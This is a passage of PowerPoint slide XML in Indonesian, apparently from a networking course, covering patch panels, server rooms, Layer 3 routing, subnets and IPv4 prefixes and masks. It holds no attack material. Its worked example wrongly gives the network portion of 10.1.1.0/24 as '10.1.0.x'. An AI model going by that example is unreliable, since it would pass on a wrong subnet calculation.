              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan panel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> inti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di area yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> patch.</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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19720024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Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Layer 3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> routing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Layer 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merepresentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (subnet). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3, node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet Protocol (IP) dan link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Internet Protocol (IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan subnet. Alamat IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 (IPv4) 32-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertitik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet mask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID host. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP 10.1.1.0/24, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> /24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (10.1.0.x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Awalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> /24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet mask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 255.255.255.0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarkis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet IP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> layer 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
